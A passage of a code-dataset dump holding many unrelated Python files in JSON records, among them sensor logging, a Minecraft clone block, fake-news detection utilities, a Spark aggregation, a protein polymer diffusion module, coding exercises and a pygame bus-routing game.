bme280.get()\nccs811.compensate(h, t)\n\nif not os.path.exists(CSV_FILENAME):\n # write header\n with open(CSV_FILENAME, 'w') as f:\n f.write('Date, CO2 ppm, Celsius, Humidity %, Pressure hPa\\n')\n\nwith open(CSV_FILENAME, 'a') as f:\n while(True):\n try:\n p, t, h = bme280.get()\n voc, co2 = ccs811.get()\n ccs811.compensate(h, t)\n if co2 == 0:\n continue\n now = datetime.now()\n # print(f\"{now.isoformat()}, {p:7.2f} hPa, {t:6.2f} C, {h:5.2f} %, eCO2:{co2:4d} ppm\")\n f.write(f\"{now}, {co2}, {t}, {h}, {p}\\n\")\n f.flush()\n sleep(60*10)\n except OSError:\n # i2c bus somtimes cannot access\n continue\n except KeyboardInterrupt:\n break\n","repo_name":"nv-h/i2c_env_sensors","sub_path":"save_csv.py","file_name":"save_csv.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24071737701","text":"from .Block import *\n\nFACES = [\n (0, 1, 0),\n (0, -1, 0),\n (-1, 0, 0),\n (1, 0, 0),\n (0, 0, 1),\n (0, 0, -1),\n]\n\n\nclass redstone_lamp_off(Block):\n def getName(self):\n return \"minecraft:redstone_lamp\"\n\n def getTex(self):\n return tex_coords((14, 9), (14, 9), (14, 9))\n\n def update(self, model, world):\n (x, y, z) = self.pos\n for (dx, dy, dz) in FACES:\n npos = (x + dx, y + dy, z + dz)\n if npos in model.world:\n if model.world[npos].redstone_level:\n model.add_block(self.pos, \"extra:redstone_lamp_on_private_instance\")\n # print(\"[DEBUG] redstone lamp state change to high\")\n\n def redstoneStateUpdate(self, model, world):\n self.update(model, world)\n\n destroygroups = [destroyGroups.PIKAXE]\n\n\nhandler.register(redstone_lamp_off)\n","repo_name":"uuk0/mcpython-a-minecraft-clone-in-python","sub_path":"mods/mcpython/Blocks/redstone_lamp_off.py","file_name":"redstone_lamp_off.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"3992463889","text":"#optimised algorithm\ndef callOptimised(alpha,beta,gamma,iter_num,burnin,thin,actual):\n mCount,nCount,track1,newalpha,result1=gibbs_sampling(alpha,beta,gamma,iter_num,burnin,thin,False,actual)\n mCred,nCred=find_credibility(mCount, nCount)\n nCount,mCount,track2,_,result2=gibbs_sampling(newalpha,beta,gamma,30,burnin,thin,True,actual,mCred,nCred)\n return result2,actual\n\n#credibility score function\ndef find_credibility(mCount,nCount):\n mCred={}\n nCred={}\n for username,value1,value2 in mCount:\n den=mCount[(username,1,1)]+mCount[(username,0,0)]+mCount[(username,1,0)]+mCount[(username,0,1)]\n if(den==0):\n mCred[username]=0\n continue\n cred=(mCount[(username,1,1)]+mCount[(username,0,0)])/den\n mCred[username]=cred\n \n for username,value1,value2,value3 in nCount:\n den=nCount[(username,0,1,0)]+nCount[(username,0,1,1)]+nCount[(username,1,0,0)]+nCount[(username,1,0,0)]+nCount[(username,1,1,0)]+nCount[(username,1,1,1)]+nCount[(username,0,0,0)]+nCount[(username,0,0,1)]\n if(den==0):\n nCred[username]=0\n continue\n cred=(nCount[(username,0,0,0)]+nCount[(username,1,1,1)])/den\n nCred[username]=cred\n return mCred,nCred\n\n#function to get new hyper parameters\ndef getNewHyper(mCount):\n truepositive=0\n truenegative=0\n falsepositive=0\n falsenegative=0\n \n for (username,val1,val2),key in mCount.items():\n if(val1==1 and val2==1):\n truepositive+=key\n elif (val1==1 and val2==0):\n falsenegative+=key\n elif (val1==0 and val2==0):\n truenegative+=key\n else:\n falsepositive+=key\n truerate=(truepositive+truenegative)/2\n falserate=(falsepositive+falsenegative)/2\n tr=truerate*10/(truerate+falserate)\n fr=falserate*10/(truerate+falserate)\n return tr,fr\n","repo_name":"asifahmed0021/unsupervised-fake-news-detection","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9771662646","text":"import datetime\nfrom pyspark.sql import DataFrame, SparkSession\nfrom pyspark.sql.functions import avg, col, size, split, round\nfrom aggregation import variables as V\nfrom common.utils import get_date_partition, add_imported_at\n\n\ndef main(df_reviews: DataFrame,\n df_business: DataFrame,\n df_checkins: DataFrame,\n execution_date: datetime.datetime,\n spark: SparkSession):\n \"\"\"\n :param df_reviews:\n :param df_business:\n :param df_checkins:\n :param execution_date:\n :param spark:\n :return:\n \"\"\"\n df_business_unique = _get_unique_business(df_business, spark)\n df_business_unique.persist()\n df_review_agg = _aggregate_avg_stars(df_reviews)\n df_star_business = _join_business(df_review_agg, df_business_unique)\n df_star_business = add_imported_at(df_star_business, get_date_partition(execution_date))\n df_checkin = _checkin_business(df_checkins)\n df_checkin_business = _join_business(df_checkin, df_business_unique)\n\n return df_star_business.select(V.COLUMNS_STAR_BUSINESS), df_checkin_business.select(V.COLUMNS_CHECKIN_BUSINESS)\n\n\ndef _aggregate_avg_stars(df_reviews: DataFrame):\n \"\"\"\n\n :param df_reviews:\n :return:\n \"\"\"\n return df_reviews.groupBy(\"business_id\", \"week\") \\\n .agg(round(avg(\"stars\"), 2).alias(\"avg_stars\"))\n\n\ndef _get_unique_business(df_business: DataFrame, spark: SparkSession):\n \"\"\"\n\n :param df_business:\n :param spark:\n :return:\n \"\"\"\n df_business.createOrReplaceTempView(\"business\")\n return spark.sql(\"\"\"\n select business_id, \n name,\n address,\n stars,\n city,\n state,\n categories,\n postal_code,\n is_open\n from business group by 1,2,3,4,5,6,7,8,9\n \"\"\")\n\n\ndef _checkin_business(df_checkins: DataFrame):\n \"\"\"\n :param df_checkins:\n :return:\n \"\"\"\n return df_checkins.withColumn(\"checkin_count\", size(split(col(\"date\"), \",\")))\n\n\ndef _join_business(df: DataFrame, df_business: DataFrame):\n \"\"\"\n :param df:\n :param df_business:\n :return:\n \"\"\"\n return df.join(df_business, on=[\"business_id\"], how=\"inner\")\n","repo_name":"maheshkalani/newyorker-assignment","sub_path":"newyorker/aggregation/transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24461580413","text":"import os\nimport torch\nimport argparse\n\n\ndef _export(state_dict, component, destination, stem):\n torch.save(state_dict[component], os.path.join(destination, stem + '_' + component + '.pth'))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('checkpoint_file', type=str, help='Checkpoint file to convert (.pth file)')\n parser.add_argument('destination', type=str, help='Directory to save exported weights to')\n parser.add_argument('--export_optim', action='store_true', help='Flag for exporting optimizer state dict')\n parser.add_argument('--export_sched', action='store_true', help='Flag for exporting scheduler state dict')\n args = parser.parse_args()\n\n # Set up destination and get file stem\n os.makedirs(args.destination, exist_ok=True)\n stem = os.path.splitext(os.path.basename(args.checkpoint_file))[0]\n state_dict = torch.load(args.checkpoint_file)\n\n # Export individual state dicts\n _export(state_dict, 'model', args.destination, stem)\n if args.export_optim:\n _export(state_dict, 'optimizer', args.destination, stem)\n if args.export_sched and state_dict['scheduler'] is not None:\n _export(state_dict, 'scheduler', args.destination, stem)\n print('Exported checkpoint to', args.destination)\n","repo_name":"haydengunraj/pytorch_training_tools","sub_path":"checkpoint2weights.py","file_name":"checkpoint2weights.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23319761494","text":"'''\n계산기 2\n'''\nimport sys\nsys.stdin = open('C:/Users/SSAFY/Downloads/input.txt','r')\n\nfor tc in range(1,11):\n n = int(input())\n text = input()\n\n stack = []\n susik = ''\n for x in text:\n if x not in '+*':\n susik += x\n else:\n if x == '+':\n if stack: # 스택에 값이 있으면\n while stack: # 빼야한다 : 우선순위가 같거나 높을테니까\n susik += stack.pop()\n stack.append(x) # 다 빼고난 후에 연산자 스택에 삽입\n else: # 스택이 비어있으면 넣기\n stack.append(x)\n\n else:\n if len(stack) == 0: # 빈 스택이면 스택에 삽입\n stack.append(x)\n elif stack[-1] == '+': # peek 가 +여도 스택에 삽입\n stack.append(x)\n else: # *이면 + 나올때까지 pop\n susik += stack.pop()\n stack.append(x)\n if stack:\n for i in stack[::-1]:\n susik += i\n\n\n # 후위 표기식 계산\n stack = []\n for x in susik:\n if x not in '+*':\n stack.append(x)\n else:\n op2 = stack.pop()\n op1 = stack.pop()\n if x == '+':\n stack.append(int(op1)+int(op2))\n else:\n stack.append(int(op1)*int(op2))\n\n print(f'#{tc} {stack[0]}')","repo_name":"YUNA-AHN/TIL","sub_path":"02_Algorithm/13_Queue/13_DAY_1223.py","file_name":"13_DAY_1223.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"45678105525","text":"import base\nfrom tornado.web import authenticated\nfrom tlog.base.team import Teams\n\nclass Handler(base.Handler):\n\n @authenticated\n def get(self):\n teams = Teams.get()\n self.render(\n 'teams.html', \n title='Teams',\n teams=teams,\n )","repo_name":"thomaserlang/TLog","sub_path":"src/tlog/web/handlers/teams.py","file_name":"teams.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"41443943218","text":"\"\"\"Chroma learns to reverse a correlated diffusion process which respects the chain and density constraints that\nalmost all structures satisfy. This allows the model to focus most of its capacity on non-trivial dependencies. This\nsection implements the polymer-structured diffusions: multivariate Gaussian distributions for protein structures that\n(i) are SO(3) invariant, (ii) enforce protein chain and radius of gyration statistics, and (iii) can be computed in\nlinear time. This module implements various functions for the polymer-structured diffusion and utility functions that\ncompute key metrics such as radius of gyration.\"\"\"\n\n# Dependencies\nimport jax\nimport jax.numpy as jnp\nimport numpy as np\n\n# Constants for diffusion schedule (Song et al. 2021)\nB_MAX = 20\nB_MIN = 0.1\n\n\ndef diffuse(noise, R, x0, timestep):\n \"\"\"This method diffuses the coordinates of the polymer up to the given time. The diffusion\n is integrated forward in time according to the following formula:\n x_t = sqrt(alpha_t)*x0 + sqrt(1-alpha_t)*matmul(R,z) where z follows multivariate normal.\n Args:\n noise: noise (z) that follows z ~ N(0, I) of shape [N_atoms, 3]\n R: square root of the covariance matrix\n x0: a matrix of size [N_atoms, 3]\n timestep: the timestep between [0, 1] where 0 is the data and 1 is noise.\n Returns:\n noised coordinates of shape [N_at, 3]\n TODO: implement mean deflation\n (unit-tested)\"\"\"\n # Get alpha_t from diffusion schedule\n alpha_t = get_alpha_t(timestep)\n one_m_alpha_t = get_stable_1malpha(timestep) # numerically stable implementation of (1 - alpha_t)\n rz = jnp.matmul(R, noise) # Compute prior rz\n\n # Diffusion Step\n x_t = jnp.sqrt(alpha_t) * x0 + jnp.sqrt(one_m_alpha_t) * rz\n return x_t\n\n\ndef ideal_covariance(z, gamma, delta):\n \"\"\"This method computes the matmul(R, z) for the ideal chain covariance model. For the formula, see section C.2\n 'Covariance model #1: Ideal Chain' in Chroma Paper.\n Args:\n z: noise samples from z ~ N(0, I) of shape x0.shape\n n_atoms: number of atoms in chain\n gamma: length scale of the chain\n delta: amount of allowed translational noise about the origin\n (unit-tested)\"\"\"\n n_atoms = z.shape[0]\n cu_z = gamma * jnp.cumsum(z, axis=0) # cumulative z\n constant_terms = delta * cu_z[0] - (1 / n_atoms) * (jnp.sum(cu_z))\n rz = cu_z + constant_terms\n return rz\n\n\ndef rg_confined_covariance(n_atoms, a, b):\n \"\"\"This method computes the matmul(R, z) for the Rg-confined, linear-time Polymer MVNs. For the construction of\n the R matrix, see section C.3 'Covariance model #2: Rg-confined, linear-time Polymer MVNs' in the Chroma Paper.\n Args:\n n_atoms: number of atoms in protein\n a: a global scale parameter setting the 'segment length' of polymer\n b: a 'decay' parameter which sets the memory of the chain to fluctuations\n Returns:\n (unit-tested)\"\"\"\n # Construct Rg confined covariance matrix\n b_vec = b ** (np.arange(n_atoms)) # [N_at,]\n\n rows = []\n v = 1 / (np.sqrt(1 - b ** 2))\n for i in range(len(b_vec)):\n row = np.flip(b_vec[:len(b_vec) - i])\n row[0] = row[0] * v # Multiplying v with the first element, jnp.at for updates\n padded_row = np.pad(row, (0, i))\n rows.append(padded_row)\n rows.reverse()\n R = a * np.stack(rows, axis=0)\n R_inverse = np.linalg.inv(R)\n return R, R_inverse\n\n\ndef get_alpha_t(t):\n \"\"\"Returns the alpha_t value that is equivalent to the perturbation kernel used in Song et al. 2021\"\"\"\n x = -(1/2) * (t**2) * (B_MAX - B_MIN) - t * B_MIN\n return jnp.exp(x)\n\n\ndef get_stable_1malpha(t):\n \"\"\"Numerically stable implementation of (1-alpha_t) with the stable jnp.expm1 primitive.\"\"\"\n x = -(1 / 2) * (t ** 2) * (B_MAX - B_MIN) - t * B_MIN\n return - jnp.expm1(x)\n\n\ndef get_beta_t(t):\n \"\"\"Returns the ß(t) value that is used in the SDEs. The ß(t) schedule is the same as that used in\n Song et al. 2021.\"\"\"\n return B_MIN + t * (B_MAX - B_MIN)\n\n\ndef SNR(t):\n return get_alpha_t(t) / get_stable_1malpha(t)\n\n\ndef compute_b(N, B, a):\n \"\"\"This method computes b given the global scaling factor a. See section C.3.2 in Chroma Paper for the derivation\n of the formula. The derivation makes a power law approximation for the radius of gyration in the form r*(N**v)\n where r is a prefactor and v is the Flory coefficient. The values of r and v are taken from Tanner (2016) in the\n paper 'Empirical power laws for the radii of gyration of protein oligomers.' The experimentally determined values\n are: prefactor r = 2 Angstroms (0.2 nanometers) and v = 0.4. Tanner (2016) showed that the v of oligomers was\n almost identical to that of monomers which is 0.4. Since this function uses n_atoms as its input, the r is rescaled\n to 1.148698355.\n Args:\n N: number of residues in the protein\n B: number of atoms per residue\n a: global scale factor that determines the 'segment length' of the polymer\n \"\"\"\n # (See Tanner, 2016)\n n_atoms = N * B\n r = (2.0 / np.sqrt(3)) / (B ** 0.4) # r is an experimentally determined prefactor with value 2.0 Angstroms but is\n # scaled to this value when n_atoms are used. Also, the segment length 'a' of 3.8 Angstroms is scaled with\n # sqrt(3) so r has to be scaled with the same number to keep b invariant\n v = 0.4 # narrow range between 0.38-0.40, taken to be 0.40 (See Tanner, 2016)\n b_effective = 3 / n_atoms + (n_atoms ** (-v)) * np.sqrt(\n n_atoms ** (2 * v - 2) * (n_atoms ** 2 + 9) - ((a ** 2) / (r ** 2)))\n return b_effective\n\n\ndef deflate_mean(x, xi):\n \"\"\"This method implements the mean-deflation operation that re-tunes the translational variance of each chain.\n Args: x: the atom coordinates (N, 3) xi: set based on pile-of-globs or glob-of-globs covariance modes.\n Pile-of-globs: set xi so that the translational variance of each chain is unity. This will cause chains to have a\n realistic radius of gyration but pile up at the origin. Glob-of-globs covariance: set xi per chain by solving for\n the translational variance that also implements the correct whole-complex Rg scaling as a function of the number\n of residues.\n \"\"\"\n pass\n\n\ndef compute_radius_of_gyration(coordinates):\n \"\"\"This method computes the radius of gyration given the coordinates of all atoms.\n Formula from Tanner, 2016:\n Rg = sqrt(sum_over_i(r_i - r_o)/n_atoms) where r_o = sum_over_i(r_i) / n_atoms\n Args:\n coordinates: a matrix of size (N, 3) where N is the number of atoms in complex\n (unit-tested)\"\"\"\n r_o = jnp.average(coordinates, axis=0)\n squared_residuals = jnp.sum(((coordinates - r_o) ** 2), axis=1)\n rg = jnp.sqrt(jnp.average(squared_residuals, axis=0))\n return rg\n","repo_name":"ardagoreci/Chroma","sub_path":"model/polymer.py","file_name":"polymer.py","file_ext":"py","file_size_in_byte":6833,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"39543719151","text":"import pytest\n\nfrom exercise_28_join_numbers.exercise_28_join_numbers import join_numbers\nfrom exercise_28_join_numbers.exercise_28_join_ten_numbers import join_ten_numbers\n\n\n@pytest.mark.parametrize(('seq', 'string'), [\n (range(15), '0,1,2,3,4,5,6,7,8,9,10,11,12,13,14'),\n (range(10, 15), '10,11,12,13,14'),\n (range(0), '')\n])\ndef test_join_numbers(seq, string):\n assert join_numbers(seq) == string\n\n\n@pytest.mark.parametrize(('seq', 'string'), [\n (range(15), '0,1,2,3,4,5,6,7,8,9,10'),\n (range(10, 15), '10'),\n (range(0), '')\n])\ndef test_join_ten_numbers(seq, string):\n assert join_ten_numbers(seq) == string\n","repo_name":"RubanovDmitriy/Python_Workout_50_Essential_Exercises_by_Reuven_M_Lerner","sub_path":"exercise_28_join_numbers/test_ex28.py","file_name":"test_ex28.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"70397387002","text":"\n\n# Write a program that asks for an integer n,\n# then it creates a two-dimensional array (of integers) of the specified\n# size (nxn) with the value of 1 on the main diagonal and the value of 0\n# everywhere else. Print the 2d array into the output\n#\n# Example:\n#\n# Please enter the array (matrix) size: 4\n# 1 0 0 0\n# 0 1 0 0\n# 0 0 1 0\n# 0 0 0 1\n\nm = int(input(\"please enter the row :\"))\nn = int(input(\"please enter the cols :\"))\n\nfor i in range(1, m+1):\n for j in range(1, n+1):\n if i==j:\n print(1, end=\" \")\n else:\n print(0, end=\" \")\n print(\"\\r\")\n\n\n","repo_name":"Sthakur19/python-greenfox","sub_path":"list/diagonal_matrix.py","file_name":"diagonal_matrix.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9885570630","text":"height = eval(input(\"Enter the height of the triangle:\\n\"))\r\nnum=1\r\ncount=0\r\nfor i in range((2*height-1),0,-1):\r\n print(\" \"*(height-count-1),\"*\"*num,sep=\"\")\r\n num+=2\r\n count+=1\r\n if count==height:\r\n break\r\n ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_3/klsada002/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1729315932","text":"import pygame\nfrom pygame.locals import *\nimport time\nimport threading\nfrom Main import Main\nfrom Mapping import Mapping\n\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nLIGHTGREEN = (76, 153, 0)\nDARKGREEN = (0, 102, 0)\nYELLOW = (255, 196, 0)\nORANGE = (255, 128, 0)\nRED = (255, 0, 0)\nBLUE = (22,118,186)\n\nMAPRED = Mapping.getMapping('red')\nMAPBLUE = Mapping.getMapping('blue')\n\nx_coordb = [755, 700, 670, 625, 685, 740, 780, 840, 785, 670, 595, 560, 505, 400, 320, 245, 230, 200, 180, 300, 380, 400, 300, 318, 420, 510, 580, 700, 800]\ny_coordb = [-490, -380, -290, -180, -120, -40, 40, 120, 205, 230, 225, 335, 420, 360, 360, 310, 210, 60, -10, -40, -90, -135, -225, -305, -398, -470, -530, -575, -560]\nanglesb = [-45, -20, -20, -42, 55, 10, 40, 20, -55, -90, -55, 0, -55, 230, -45, 180, 190, 180, 120, 120, 120, 230, 230, 135, 125, 125, 125, 105, 45]\n\nangles = [45, 90, 105, 120, 125, 135, 230, 230, 120, 120, 180,185, 190,185, 200,-90, -55, 0, -55, -90, -55, 20, 40, 10, 55, -42, -20, -20, -45]\nx_coord = [800,750, 700,640, 520, 345, 325, 420, 360, 260, 220, 260, 265,270, 265,395,505, 590, 595, 670, 785, 880, 805, 765, 685, 685, 710,730, 785]\ny_coord = [-560, -570, -575, -540, -490, -335, -245, -135, -70, -20, 20, 185, 250,345, 400, 470, 420, 335, 225, 220, 205, 120, 65, -40, -120, -205, -330, -430, -510]\n\nx_prog = [150, 95, 100, 225, 363, 471, 479, 428, 418, 464, 414, 294,155]\ny_prog = [355, 482, 560, 653, 564, 503, 432, 329, 239, 154, 74, 108,220]\n\nx_progb = [721, 719, 771, 851,1030, 982, 1011, 1046, 921, 787, 684, 652]\ny_progb = [360, 282, 180, 119,148, 246, 370, 494, 553, 542, 539, 434]\n\n\nclass frontEnd:\n\n def __init__(self):\n \n pygame.init()\n #FONT AND TEXT FOR WELCOME SCREEN\n self.font = pygame.font.SysFont(\"phosphate\", 23)\n self.text = self.font.render(\"Click to Start\", True, (230, 179, 14))\n # Set the height and width of the screen\n self.w, self.h = 1200, 750\n self.screen = pygame.display.set_mode([self.w,self.h])\n pygame.display.set_caption(\"Game Screen\")\n # load logo\n self.loadLogo()\n # load Red Map\n self.loadRedMap()\n # load blue Map\n self.loadBlueMap()\n # load bus image\n self.loadBus()\n self.backEnd = Main()\n # Loop until the user clicks the close button.\n self.done = False\n self.page = 1\n # load + image\n self.loadAdd()\n self.totalCost = 0\n\n def loadLogo(self):\n #SETTING FOR LOGO \n self.logo = pygame.image.load('logo.png')\n self.logo.convert()\n self.rectLogo = self.logo.get_rect()\n self.rectLogo.center = self.w//2, (self.h-50)//2\n\n def loadAdd(self):\n #SETTING FOR ADD\n self.add = pygame.image.load('plus.png')\n self.add.convert()\n self.rectAdd = self.add.get_rect()\n self.rectAdd.center = (self.w-195)//2, (self.h+530)//2\n self.rectAdd2 = self.add.get_rect()\n self.rectAdd2.center = (self.w+945)//2, (self.h+530)//2\n\n def loadRedMap(self):\n #SETTING FOR RED MAP\n self.redMap = pygame.image.load('red1.png')\n self.redMap.convert()\n self.rectRed = self.redMap.get_rect()\n self.rectRed.center = (self.w-575)//2, (self.h)//2\n\n def loadBlueMap(self):\n #SETTING FOR BLUE MAP\n self.blueMap = pygame.image.load('blue1.png')\n self.blueMap.convert()\n self.rectBlue = self.blueMap.get_rect()\n self.rectBlue.center = (self.w+575)//2, (self.h)//2\n\n def loadBus(self):\n #SETTING FOR BUS\n\n #SPAWN THE BUS EVERY TIME AT\n # x = w + 800\n # y = h - 560\n # speed = 50\n # angle = 45\n\n self.busImg = pygame.image.load('bussmol.png')\n self.busImg.convert()\n self.busRect = self.busImg.get_rect()\n self.speed = 50\n self.transparent = (0, 0, 0, 0)\n\n def move_bus(self,image, speed, x, y, angle):\n\n def rot_center(image, angle):\n center = image.get_rect().center\n rotated_image = pygame.transform.rotate(image, angle)\n new_rect = rotated_image.get_rect(center = center)\n return rotated_image, new_rect\n\n image, n = rot_center(image, angle)\n\n x += speed\n y += speed\n\n rect3 = self.busImg.get_rect()\n rect3.center = x//2, y//2\n\n self.screen.blit(image, rect3)\n\n return image\n\n def pageLoop(self):\n # -------- Page Loop -----------\n i = 0\n initHandle = True\n while not self.done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.done = True\n elif initHandle:\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.page += 1\n if self.page == 3:\n initHandle = False\n else:\n if event.type == pygame.MOUSEBUTTONDOWN:\n x, y = event.pos\n if ((x <= 524) and (x >= 477)) and ( (y <= 660) and ( y>= 615) ) :\n self.backEnd.addBus('red')\n elif ((x <= 1095) and (x >= 1048)) and ( (y <= 660) and ( y>= 615) ):\n self.backEnd.addBus('blue')\n elif x <= (self.w)//2+70 and x >= self.w//2-70 and y >= (self.h+710)//2-25 and y <= (self.h+710)//2+25:\n self.renderPage4()\n self.page = 4\n print(self.totalCost)\n \n # Set the screen background\n self.screen.fill(BLACK)\n \n if self.page == 1:\n # page 1\n self.renderPage1()\n\n elif self.page == 2:\n # page 2\n self.renderPage2()\n \n elif self.page == 3:\n # page 3\n self.renderPage3(i)\n i+=1\n \n\n def renderPage1(self):\n # page 1\n self.screen.fill(BLACK)\n\n #replace img,rect with logo,rectLogo appropriately\n self.screen.blit(self.logo, self.rectLogo)\n self.screen.blit(self.text,(615 - self.text.get_width() // 2, 410 - self.text.get_height() // 2))\n pygame.display.update()\n\n def renderPage2(self):\n\n # page 2\n pygame.draw.rect(self.screen, YELLOW, (200, 200,830,350), 2)\n \n\n self.text = self.font.render(\"WELCOME TO BUSy\", True, BLUE)\n self.screen.blit(self.text, [520, 230])\n self.text = self.font.render(\"The goal of this Game is to get the lowest cost possible.\", True, WHITE)\n self.screen.blit(self.text, [290, 280])\n self.text = self.font.render(\"The cost is increased as you add more buses due \", True, WHITE)\n self.screen.blit(self.text, [330, 310])\n self.text = self.font.render(\"to the increase in carbon footprint. The progress bar indicates\", True, WHITE)\n self.screen.blit(self.text, [250, 340])\n self.text = self.font.render(\"the number of people waiting at the bus stop - dark green indicating\", True, WHITE)\n self.screen.blit(self.text, [230, 370])\n self.text = self.font.render(\"least people and red indicating most people. The cost also increases\", True, WHITE)\n self.screen.blit(self.text, [230, 400])\n self.text = self.font.render(\"as more and more people wait at the bus stop.\", True, WHITE)\n self.screen.blit(self.text, [380, 430])\n self.text = self.font.render(\"NOTE - EACH BUS WILL RUN 5 FOR ROUNDS AND AUTOMATICALLY TERMINATE\", True, WHITE)\n self.screen.blit(self.text, [240, 490])\n pygame.display.update()\n\n def drawFullBar(self,xCoord,yCoord,fractionFull):\n if fractionFull>0.8:\n Color = RED\n elif fractionFull>0.6:\n Color = ORANGE\n elif fractionFull>0.4:\n Color = YELLOW\n elif fractionFull>0.2:\n Color = LIGHTGREEN\n else:\n Color = DARKGREEN\n\n pygame.draw.rect(self.screen, Color, (xCoord,yCoord,50,15), 2)\n pygame.draw.rect(self.screen, Color, (xCoord,yCoord,int(50*fractionFull),15))\n\n def drawBusBlue(self,i):\n self.move_bus(self.busImg,self.speed,self.w+x_coordb[i],self.h+y_coordb[i], anglesb[i]+180)\n\n def drawBusRed(self,i):\n self.move_bus(self.busImg,self.speed,30 + x_coord[i],self.h+y_coord[i], angles[i])\n\n def renderPage3(self,i):\n self.screen.fill(BLACK)\n # img1/img2 replace by red/blue\n self.screen.blit(self.redMap, self.rectRed)\n self.screen.blit(self.blueMap, self.rectBlue)\n self.screen.blit(self.add,self.rectAdd)\n self.screen.blit(self.add,self.rectAdd2)\n pygame.draw.rect(self.screen, (255,255,255), ((self.w)//2-70, (self.h +710)//2-25,140,50))\n self.fin = self.font.render(\"FINISH!\", True, (0, 0, 0))\n\n self.rectAddfin = self.fin.get_rect()\n self.rectAddfin.center = (self.w)//2, (self.h + 710 )//2\n\n self.screen.blit(self.fin, self.rectAddfin)\n\n busStopsRed = self.backEnd.getBusStops('red')\n\n for x,stop in enumerate(busStopsRed):\n self.drawFullBar(x_prog[x],y_prog[x],stop.currentCapacity/stop.maxCapacity)\n\n busStopsBlue = self.backEnd.getBusStops('blue')\n for x,stop in enumerate(busStopsBlue):\n self.drawFullBar(x_progb[x],y_progb[x],stop.currentCapacity/stop.maxCapacity)\n\n busesred = self.backEnd.getActiveBuses('red')\n\n for bus in busesred:\n i = MAPRED[bus.currentLocation]\n self.drawBusRed(i)\n\n busesblue = self.backEnd.getActiveBuses('blue')\n\n for bus in busesblue:\n i = MAPBLUE[bus.currentLocation]\n self.drawBusBlue(i)\n # add for loop to render the buses\n # add for loop to render the fullness bars\n # for x in range(len(x_progb)):\n \n\n # for x in range(len(x_prog)):\n # self.drawFullBar(x_prog[x],y_prog[x],0.75)\n self.totalCost += self.backEnd.step()\n\n self.text = self.font.render(\"Total Cost: \"+str(self.totalCost), True, (230, 179, 14))\n\n self.rectAddf = self.text.get_rect()\n self.rectAddf.center = (self.w)//2, (self.h -710 )//2\n\n self.screen.blit(self.text, self.rectAddf)\n\n\n\n # self.drawFullBar(851,119,0.75)\n pygame.time.wait(500)\n pygame.display.update()\n\n\n def renderPage4(self):\n self.screen.fill(BLACK)\n \n self.text = self.font.render(\"THANK YOU!\", True, (255, 255, 255))\n self.rectAddt = self.text.get_rect()\n self.rectAddt.center = (self.w)//2, (self.h)//2\n\n self.screen.blit(self.text, self.rectAddt)\n\n self.textc = self.font.render(\"Total Cost: \"+str(self.totalCost), True, (255, 255, 255))\n self.rectAddc = self.textc.get_rect()\n self.rectAddc.center = (self.w)//2, (self.h - 100)//2\n\n self.screen.blit(self.textc, self.rectAddc)\n\n pygame.display.update()\n \n\n \nif __name__ == \"__main__\":\n a= frontEnd()\n a.pageLoop()\n \n","repo_name":"swakv/BUS-ROUTING-GAME","sub_path":"frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":11172,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"1907463721","text":"import numpy as np\r\nimport pandas as pd\r\nimport scipy as sp\r\nfrom scipy.stats import chi2\r\nfrom scipy.stats import chi2_contingency\r\n\r\ncrD=pd.read_csv('D:\\Courses\\BSE-BI\\BSE\\BSE\\Statistics-II\\Chi-Square\\Codes\\Dataset\\Credit.csv',header=\"infer\")\r\nprint(crD.shape)\r\n#Find frequency of a continuous column in discrete bins\r\nfor cols in crD.columns:\r\n print(cols)\r\nfreq=crD['Income'].value_counts(bins=4)\r\nprint(freq)\r\n\r\n#chi square test for independence\r\nctab=pd.crosstab(crD.Defaultee, pd.cut(crD.Income, [10,54.424,98.494,142.564,186.634], include_lowest=True), margins=False)\r\nprint(ctab)\r\nstat, p, dof, expected=chi2_contingency(ctab)\r\nprob=0.95\r\ncritical=chi2.ppf(prob,dof)\r\nif(abs(stat)>=critical):\r\n print('Dependent (Reject H0)')\r\nelse:\r\n print('Independent (Accept H0)')","repo_name":"manishbhnau/Repo","sub_path":"credit_chi2_independence.py","file_name":"credit_chi2_independence.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"2615506684","text":"\"\"\"\nDay 2: I Was Told There Would Be No Math\n\n--- Part 1 ---\n\nThe elves are running low on wrapping paper, and so they need to submit\nan order for more. They have a list of the dimensions (length l,\nwidth w, and height h) of each present, and only want to order 